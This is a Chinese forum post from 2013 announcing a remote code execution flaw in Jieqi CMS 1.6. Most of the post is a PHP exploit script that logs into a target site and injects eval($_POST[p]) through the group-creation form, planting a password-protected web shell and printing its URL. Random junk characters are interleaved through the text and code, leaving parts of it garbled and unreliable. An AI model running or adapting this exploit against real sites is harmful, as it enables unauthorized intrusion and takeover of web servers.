杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。5 M# w- B) O! ?/ I& F7 A- T$ t
* {, S7 u% u4 Z' g6 E
! |! W ?$ m- ?% W该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
, s. S! }! _3 B5 u p 需要有一个能创建圈子的用户。
; \1 y: Q8 m9 A$ L$ f
! P/ B$ X: k/ p( t/ _$ D8 q+ _<?php5 w5 k+ E0 ?# E) D \
; P8 ^9 k; x% B' O
print_r('0 K; v: _$ |+ H* Q
+---------------------------------------------------------------------------+
8 N, K* A% A( _6 y- sJieqi CMS V1.6 PHP Code Injection Exploit
2 W8 E; G6 Z* Y9 L1 U& v8 dby flyh4t
* Y7 \, R |+ m, ` g2 ?8 Dmail: phpsec at hotmail dot com
k3 K" ?- U6 ]7 Xteam: http://www.wolvez.org6 l2 W4 S; ~+ N5 g
+---------------------------------------------------------------------------+
2 |3 w7 {, J2 x'); /**
: t6 C8 z9 ^# U @* c * works regardless of php.ini settings; B; q- d1 D$ N g4 t
*/ if ($argc < 5) { print_r(', h* ?. V, P0 S9 F% z7 C
+---------------------------------------------------------------------------+
K; N- j7 i( N* I7 G9 v2 s! ?3 t) f" {Usage: php '.$argv[0].' host path username
) d c% [5 A0 Khost: target server (ip/hostname)9 L- K2 ]6 e8 ]4 t2 D4 A" K; g
path: path to jieqicms
0 H* O( z G& ^3 U- F/ guasename: a username who can create group+ W/ R6 o0 |) [
Example:
( v+ }7 g3 Z( d- N$ N' nphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password) U# e) s7 t8 V8 u8 l+ J/ k$ V
+---------------------------------------------------------------------------+& \/ ~! p& ?$ u! u7 E5 C' p/ X
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------232811682799619 W5 C# {6 |: Y0 U
Content-Disposition: form-data; name="gname" S. P7 O5 U- U& R0 L% M M
7 _- j' s5 V& f2 ]2 T; _'; $params .="';"; $params .='eval($_POST[p]);//flyh4t4 c; {' _, I" `5 ^! Z
-----------------------------23281168279961" F0 h4 M6 Z% R
Content-Disposition: form-data; name="gcatid"& P$ O+ `& Y6 b
3 p0 H7 w/ i, V( b1 S1( n* D: R6 ~. W) B: O0 I6 R
-----------------------------23281168279961
9 q2 B, f0 Q& EContent-Disposition: form-data; name="gaudit"
& q% F9 D2 f; j) U / N/ \: f! b9 g9 V4 s
1
" s( V# A; L1 q5 F-----------------------------232811682799616 a# I' ~8 D ^* x: s; }* H
Content-Disposition: form-data; name="gbrief"
3 }7 L% L, k/ Q& T: g# f, C
^0 _1 h/ p% Z) {% C1
; p: l( n4 Z8 C-----------------------------23281168279961--
1 B( u* R ~0 u'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com: p# Q7 B0 [* F+ W6 G
( W1 H' f# d8 P1 X7 ]4 Xpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对